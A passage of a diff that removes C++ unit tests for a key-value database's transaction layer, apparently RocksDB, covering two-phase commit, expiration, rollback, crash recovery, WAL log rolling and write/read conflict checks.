-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn1->SetName("joe");
-  ASSERT_OK(s);
-
-  s = txn2->SetName("bob");
-  ASSERT_OK(s);
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-
-  txn2->GetCommitTimeWriteBatch()->Put(Slice("foo"), Slice("bar"));
-
-  s = txn2->Prepare();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TwoPhaseExpirationTest) {
-  Status s;
-
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-  txn_options.expiration = 500;  // 500ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->SetName("joe");
-  ASSERT_OK(s);
-  s = txn2->SetName("bob");
-  ASSERT_OK(s);
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  /* sleep override */
-  std::this_thread::sleep_for(std::chrono::milliseconds(1000));
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Prepare();
-  ASSERT_EQ(s, Status::Expired());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TwoPhaseRollbackTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("tfoo"), Slice("tbar"));
-  ASSERT_OK(s);
-
-  // value is readable form txn
-  s = txn->Get(read_options, Slice("tfoo"), &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "tbar");
-
-  // issue rollback
-  s = txn->Rollback();
-  ASSERT_OK(s);
-
-  // value is nolonger readable
-  s = txn->Get(read_options, Slice("tfoo"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ(txn->GetNumPuts(), 0);
-
-  // put new txn values
-  s = txn->Put(Slice("tfoo2"), Slice("tbar2"));
-  ASSERT_OK(s);
-
-  // new value is readable from txn
-  s = txn->Get(read_options, Slice("tfoo2"), &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "tbar2");
-
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // flush to next wal
-  s = db->Put(write_options, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  db_impl->TEST_FlushMemTable(true);
-
-  // issue rollback (marker written to WAL)
-  s = txn->Rollback();
-  ASSERT_OK(s);
-
-  // value is nolonger readable
-  s = txn->Get(read_options, Slice("tfoo2"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ(txn->GetNumPuts(), 0);
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // try rollback again
-  s = txn->Rollback();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, PersistentTwoPhaseTransactionTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(db->GetTransactionByName("xid"), txn);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  // txn read
-  s = txn->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  // regular db put
-  s = db->Put(write_options, Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  db_impl->TEST_FlushMemTable(true);
-
-  // regular db read
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // nothing has been prepped yet
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // still not available to db
-  s = db->Get(read_options, Slice("foo"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  db->FlushWAL(false);
-  delete txn;
-  // kill and reopen
-  s = ReOpenNoDelete();
-  ASSERT_OK(s);
-  db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  // find trans in list of prepared transactions
-  std::vector<Transaction*> prepared_trans;
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 1);
-
-  txn = prepared_trans.front();
-  ASSERT_TRUE(txn);
-  ASSERT_EQ(txn->GetName(), "xid");
-  ASSERT_EQ(db->GetTransactionByName("xid"), txn);
-
-  // log has been marked
-  auto log_containing_prep =
-      db_impl->TEST_FindMinLogContainingOutstandingPrep();
-  ASSERT_GT(log_containing_prep, 0);
-
-  // value is readable from txn
-  s = txn->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  // value is now available
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  // we already committed
-  s = txn->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // no longer is prpared results
-  prepared_trans.clear();
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 0);
-
-  // transaction should no longer be visible
-  ASSERT_EQ(db->GetTransactionByName("xid"), nullptr);
-
-  // heap should not care about prepared section anymore
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // but now our memtable should be referencing the prep section
-  ASSERT_EQ(log_containing_prep,
-            db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  db_impl->TEST_FlushMemTable(true);
-
-  // after memtable flush we can now relese the log
-  ASSERT_EQ(0, db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  delete txn;
-
-  // deleting transaction should unregister transaction
-  ASSERT_EQ(db->GetTransactionByName("xid"), nullptr);
-}
-
-// TODO this test needs to be updated with serial commits
-TEST_P(TransactionTest, DISABLED_TwoPhaseMultiThreadTest) {
-  // mix transaction writes and regular writes
-  const uint32_t NUM_TXN_THREADS = 50;
-  std::atomic<uint32_t> txn_thread_num(0);
-
-  std::function<void()> txn_write_thread = [&]() {
-    uint32_t id = txn_thread_num.fetch_add(1);
-
-    WriteOptions write_options;
-    write_options.sync = true;
-    write_options.disableWAL = false;
-    TransactionOptions txn_options;
-    txn_options.lock_timeout = 1000000;
-    if (id % 2 == 0) {
-      txn_options.expiration = 1000000;
-    }
-    TransactionName name("xid_" + std::string(1, 'A' + id));
-    Transaction* txn = db->BeginTransaction(write_options, txn_options);
-    ASSERT_OK(txn->SetName(name));
-    for (int i = 0; i < 10; i++) {
-      std::string key(name + "_" + std::string(1, 'A' + i));
-      ASSERT_OK(txn->Put(key, "val"));
-    }
-    ASSERT_OK(txn->Prepare());
-    ASSERT_OK(txn->Commit());
-    delete txn;
-  };
-
-  // assure that all thread are in the same write group
-  std::atomic<uint32_t> t_wait_on_prepare(0);
-  std::atomic<uint32_t> t_wait_on_commit(0);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "WriteThread::JoinBatchGroup:Wait", [&](void* arg) {
-        auto* writer = reinterpret_cast<WriteThread::Writer*>(arg);
-
-        if (writer->ShouldWriteToWAL()) {
-          t_wait_on_prepare.fetch_add(1);
-          // wait for friends
-          while (t_wait_on_prepare.load() < NUM_TXN_THREADS) {
-            env->SleepForMicroseconds(10);
-          }
-        } else if (writer->ShouldWriteToMemtable()) {
-          t_wait_on_commit.fetch_add(1);
-          // wait for friends
-          while (t_wait_on_commit.load() < NUM_TXN_THREADS) {
-            env->SleepForMicroseconds(10);
-          }
-        } else {
-          FAIL();
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // do all the writes
-  std::vector<port::Thread> threads;
-  for (uint32_t i = 0; i < NUM_TXN_THREADS; i++) {
-    threads.emplace_back(txn_write_thread);
-  }
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  ReadOptions read_options;
-  std::string value;
-  Status s;
-  for (uint32_t t = 0; t < NUM_TXN_THREADS; t++) {
-    TransactionName name("xid_" + std::string(1, 'A' + t));
-    for (int i = 0; i < 10; i++) {
-      std::string key(name + "_" + std::string(1, 'A' + i));
-      s = db->Get(read_options, key, &value);
-      ASSERT_OK(s);
-      ASSERT_EQ(value, "val");
-    }
-  }
-}
-
-TEST_P(TransactionTest, TwoPhaseLongPrepareTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("bob");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  for (int i = 0; i < 1000; i++) {
-    std::string key(i, 'k');
-    std::string val(1000, 'v');
-    s = db->Put(write_options, key, val);
-    ASSERT_OK(s);
-
-    if (i % 29 == 0) {
-      // crash
-      env->SetFilesystemActive(false);
-      ReOpenNoDelete();
-    } else if (i % 37 == 0) {
-      // close
-      ReOpenNoDelete();
-    }
-  }
-
-  // commit old txn
-  txn = db->GetTransactionByName("bob");
-  ASSERT_TRUE(txn);
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  // verify data txn data
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar");
-
-  // verify non txn data
-  for (int i = 0; i < 1000; i++) {
-    std::string key(i, 'k');
-    std::string val(1000, 'v');
-    s = db->Get(read_options, key, &value);
-    ASSERT_EQ(s, Status::OK());
-    ASSERT_EQ(value, val);
-  }
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, TwoPhaseSequenceTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  s = txn->Put(Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-  s = txn->Put(Slice("foo3"), Slice("bar3"));
-  ASSERT_OK(s);
-  s = txn->Put(Slice("foo4"), Slice("bar4"));
-  ASSERT_OK(s);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  // value is now available
-  s = db->Get(read_options, "foo4", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar4");
-}
-
-TEST_P(TransactionTest, TwoPhaseDoubleRecoveryTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("a");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  // commit old txn
-  txn = db->GetTransactionByName("a");
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-
-  txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("b");
-  ASSERT_OK(s);
-
-  s = txn->Put(Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  // value is now available
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar");
-
-  s = db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar2");
-}
-
-TEST_P(TransactionTest, TwoPhaseLogRollingTest) {
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Status s;
-  string v;
-  ColumnFamilyHandle *cfa, *cfb;
-
-  // Create 2 new column families
-  ColumnFamilyOptions cf_options;
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  WriteOptions wopts;
-  wopts.disableWAL = false;
-  wopts.sync = true;
-
-  TransactionOptions topts1;
-  Transaction* txn1 = db->BeginTransaction(wopts, topts1);
-  s = txn1->SetName("xid1");
-  ASSERT_OK(s);
-
-  TransactionOptions topts2;
-  Transaction* txn2 = db->BeginTransaction(wopts, topts2);
-  s = txn2->SetName("xid2");
-  ASSERT_OK(s);
-
-  // transaction put in two column families
-  s = txn1->Put(cfa, "ka1", "va1");
-  ASSERT_OK(s);
-
-  // transaction put in two column families
-  s = txn2->Put(cfa, "ka2", "va2");
-  ASSERT_OK(s);
-  s = txn2->Put(cfb, "kb2", "vb2");
-  ASSERT_OK(s);
-
-  // write prep section to wal
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  // our log should be in the heap
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            txn1->GetLogNumber());
-  ASSERT_EQ(db_impl->TEST_LogfileNumber(), txn1->GetLogNumber());
-
-  // flush default cf to crate new log
-  s = db->Put(wopts, "foo", "bar");
-  ASSERT_OK(s);
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  // make sure we are on a new log
-  ASSERT_GT(db_impl->TEST_LogfileNumber(), txn1->GetLogNumber());
-
-  // put txn2 prep section in this log
-  s = txn2->Prepare();
-  ASSERT_OK(s);
-  ASSERT_EQ(db_impl->TEST_LogfileNumber(), txn2->GetLogNumber());
-
-  // heap should still see first log
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            txn1->GetLogNumber());
-
-  // commit txn1
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  // heap should now show txn2s log
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            txn2->GetLogNumber());
-
-  // we should see txn1s log refernced by the memtables
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(),
-            txn1->GetLogNumber());
-
-  // flush default cf to crate new log
-  s = db->Put(wopts, "foo", "bar2");
-  ASSERT_OK(s);
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  // make sure we are on a new log
-  ASSERT_GT(db_impl->TEST_LogfileNumber(), txn2->GetLogNumber());
-
-  // commit txn2
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  // heap should not show any logs
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // should show the first txn log
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(),
-            txn1->GetLogNumber());
-
-  // flush only cfa memtable
-  s = db_impl->TEST_FlushMemTable(true, cfa);
-  ASSERT_OK(s);
-
-  // should show the first txn log
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(),
-            txn2->GetLogNumber());
-
-  // flush only cfb memtable
-  s = db_impl->TEST_FlushMemTable(true, cfb);
-  ASSERT_OK(s);
-
-  // should show not dependency on logs
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(), 0);
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  delete txn1;
-  delete txn2;
-  delete cfa;
-  delete cfb;
-}
-
-TEST_P(TransactionTest, TwoPhaseLogRollingTest2) {
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Status s;
-  ColumnFamilyHandle *cfa, *cfb;
-
-  ColumnFamilyOptions cf_options;
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  WriteOptions wopts;
-  wopts.disableWAL = false;
-  wopts.sync = true;
-
-  auto cfh_a = reinterpret_cast<ColumnFamilyHandleImpl*>(cfa);
-  auto cfh_b = reinterpret_cast<ColumnFamilyHandleImpl*>(cfb);
-
-  TransactionOptions topts1;
-  Transaction* txn1 = db->BeginTransaction(wopts, topts1);
-  s = txn1->SetName("xid1");
-  ASSERT_OK(s);
-  s = txn1->Put(cfa, "boys", "girls1");
-  ASSERT_OK(s);
-
-  Transaction* txn2 = db->BeginTransaction(wopts, topts1);
-  s = txn2->SetName("xid2");
-  ASSERT_OK(s);
-  s = txn2->Put(cfb, "up", "down1");
-  ASSERT_OK(s);
-
-  // prepre transaction in LOG A
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  // prepre transaction in LOG A
-  s = txn2->Prepare();
-  ASSERT_OK(s);
-
-  // regular put so that mem table can actually be flushed for log rolling
-  s = db->Put(wopts, "cats", "dogs1");
-  ASSERT_OK(s);
-
-  auto prepare_log_no = txn1->GetLogNumber();
-
-  // roll to LOG B
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  // now we pause background work so that
-  // imm()s are not flushed before we can check their status
-  s = db_impl->PauseBackgroundWork();
-  ASSERT_OK(s);
-
-  ASSERT_GT(db_impl->TEST_LogfileNumber(), prepare_log_no);
-  ASSERT_GT(cfh_a->cfd()->GetLogNumber(), prepare_log_no);
-  ASSERT_EQ(cfh_a->cfd()->GetLogNumber(), db_impl->TEST_LogfileNumber());
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            prepare_log_no);
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(), 0);
-
-  // commit in LOG B
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(), prepare_log_no);
-
-  ASSERT_TRUE(!db_impl->TEST_UnableToFlushOldestLog());
-
-  // request a flush for all column families such that the earliest
-  // alive log file can be killed
-  db_impl->TEST_HandleWALFull();
-  // log cannot be flushed because txn2 has not been commited
-  ASSERT_TRUE(!db_impl->TEST_IsLogGettingFlushed());
-  ASSERT_TRUE(db_impl->TEST_UnableToFlushOldestLog());
-
-  // assert that cfa has a flush requested
-  ASSERT_TRUE(cfh_a->cfd()->imm()->HasFlushRequested());
-
-  // cfb should not be flushed becuse it has no data from LOG A
-  ASSERT_TRUE(!cfh_b->cfd()->imm()->HasFlushRequested());
-
-  // cfb now has data from LOG A
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  db_impl->TEST_HandleWALFull();
-  ASSERT_TRUE(!db_impl->TEST_UnableToFlushOldestLog());
-
-  // we should see that cfb now has a flush requested
-  ASSERT_TRUE(cfh_b->cfd()->imm()->HasFlushRequested());
-
-  // all data in LOG A resides in a memtable that has been
-  // requested for a flush
-  ASSERT_TRUE(db_impl->TEST_IsLogGettingFlushed());
-
-  delete txn1;
-  delete txn2;
-  delete cfa;
-  delete cfb;
-}
-/*
- * 1) use prepare to keep first log around to determine starting sequence
- * during recovery.
- * 2) insert many values, skipping wal, to increase seqid.
- * 3) insert final value into wal
- * 4) recover and see that final value was properly recovered - not
- * hidden behind improperly summed sequence ids
- */
-TEST_P(TransactionTest, TwoPhaseOutOfOrderDelete) {
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-  WriteOptions wal_on, wal_off;
-  wal_on.sync = true;
-  wal_on.disableWAL = false;
-  wal_off.disableWAL = true;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(wal_on, txn_options);
-
-  s = txn1->SetName("1");
-  ASSERT_OK(s);
-
-  s = db->Put(wal_on, "first", "first");
-  ASSERT_OK(s);
-
-  s = txn1->Put(Slice("dummy"), Slice("dummy"));
-  ASSERT_OK(s);
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  s = db->Put(wal_off, "cats", "dogs1");
-  ASSERT_OK(s);
-  s = db->Put(wal_off, "cats", "dogs2");
-  ASSERT_OK(s);
-  s = db->Put(wal_off, "cats", "dogs3");
-  ASSERT_OK(s);
-
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  s = db->Put(wal_on, "cats", "dogs4");
-  ASSERT_OK(s);
-
-  db->FlushWAL(false);
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  s = db->Get(read_options, "first", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "first");
-
-  s = db->Get(read_options, "cats", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "dogs4");
-}
-
-TEST_P(TransactionTest, FirstWriteTest) {
-  WriteOptions write_options;
-
-  // Test conflict checking against the very first write to a db.
-  // The transaction's snapshot will have seq 1 and the following write
-  // will have sequence 1.
-  Status s = db->Put(write_options, "A", "a");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "b");
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, FirstWriteTest2) {
-  WriteOptions write_options;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  // Test conflict checking against the very first write to a db.
-  // The transaction's snapshot is a seq 0 while the following write
-  // will have sequence 1.
-  Status s = db->Put(write_options, "A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "b");
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WriteOptionsTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = true;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  ASSERT_TRUE(txn->GetWriteOptions()->sync);
-
-  write_options.sync = false;
-  txn->SetWriteOptions(write_options);
-  ASSERT_FALSE(txn->GetWriteOptions()->sync);
-  ASSERT_TRUE(txn->GetWriteOptions()->disableWAL);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WriteConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "A");
-  db->Put(write_options, "foo2", "B");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("foo", "A2");
-  ASSERT_OK(s);
-
-  s = txn->Put("foo2", "B2");
-  ASSERT_OK(s);
-
-  // This Put outside of a transaction will conflict with the previous write
-  s = db->Put(write_options, "foo", "xxx");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "A");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "A2");
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "B2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WriteConflictTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  // This Put outside of a transaction will conflict with a later write
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  s = txn->Put("foo2", "X");
-  ASSERT_OK(s);
-
-  s = txn->Put("foo",
-               "bar2");  // Conflicts with write done after snapshot taken
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn->Put("foo3", "Y");
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  ASSERT_EQ(2, txn->GetNumKeys());
-
-  s = txn->Commit();
-  ASSERT_OK(s);  // Txn should commit, but only write foo2 and foo3
-
-  // Verify that transaction wrote foo2 and foo3 but not foo
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "X");
-
-  db->Get(read_options, "foo3", &value);
-  ASSERT_EQ(value, "Y");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, ReadConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  // This Put outside of a transaction will conflict with the previous read
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, TxnOnlyTest) {
-  // Test to make sure transactions work when there are no other writes in an
-  // empty db.
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("x", "y");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, FlushTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Put(Slice("foo"), Slice("bar2"));
-  ASSERT_OK(s);
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // Put a random key so we have a memtable to flush
-  s = db->Put(write_options, "dummy", "dummy");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  FlushOptions flush_ops;
-  db->Flush(flush_ops);
-
-  s = txn->Commit();
-  // txn should commit since the flushed table is still in MemtableList History
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, FlushTest2) {
-  const size_t num_tests = 3;
-
-  for (size_t n = 0; n < num_tests; n++) {
-    // Test different table factories
-    switch (n) {
-      case 0:
-        break;
-      case 1:
-        options.table_factory.reset(new mock::MockTableFactory());
-        break;
-      case 2: {
-        PlainTableOptions pt_opts;
-        pt_opts.hash_table_ratio = 0;
-        options.table_factory.reset(NewPlainTableFactory(pt_opts));
-        break;
-      }
-    }
-
-    Status s = ReOpen();
-    ASSERT_OK(s);
-
-    WriteOptions write_options;
-    ReadOptions read_options, snapshot_read_options;
-    TransactionOptions txn_options;
-    string value;
-
-    DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-    db->Put(write_options, Slice("foo"), Slice("bar"));
-    db->Put(write_options, Slice("foo2"), Slice("bar2"));
-    db->Put(write_options, Slice("foo3"), Slice("bar3"));
-
-    txn_options.set_snapshot = true;
-    Transaction* txn = db->BeginTransaction(write_options, txn_options);
-    ASSERT_TRUE(txn);
-
-    snapshot_read_options.snapshot = txn->GetSnapshot();
-
